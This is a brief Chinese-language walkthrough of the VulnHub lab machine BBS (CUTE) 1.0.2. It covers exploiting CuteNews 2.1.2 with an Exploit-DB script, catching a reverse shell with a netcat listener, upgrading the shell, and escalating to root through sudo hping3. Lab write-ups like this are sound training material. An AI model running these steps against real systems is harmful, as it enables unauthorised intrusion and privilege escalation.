BBS (CUTE): 1.0.2 https://www.vulnhub.com/entry/bbs-cute-102,567/
靶场配置网络
登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式
ip add 看到网卡名字叫做ens33
需要修改网卡配置文件
vi /etc/network/interfaces
allow-hotplug ens33
iface ens33 1inet dhcp
重启获得IP地址
使用目录扫描,获得
http://192.168.204.134/index.php
留意到版本号CuteNews 2.1.2
在kali上操作
searchsploit cutenews 2.1.2 看到路径
cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./
修改py配置文件,将所有的/CuteNews删除
执行命令python3 48800.py
输入http://192.168.204.134获得账号名密码
登录BBS (CUTE): 1.0.2,找到注入点
在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)
python -c 'import pty;pty.spawn("/bin/bash")'
-c : 执行具体的代码
import :导入语句
pty : 终端(接口)
pty.spawn : 执行命令
export TERM=screen
stty rows 45 columns 194 (参考stty -a)
reset
通过sudo -l 查看权限
/usr/sbin/hping3 获得root权限
find / -name /root/root.txt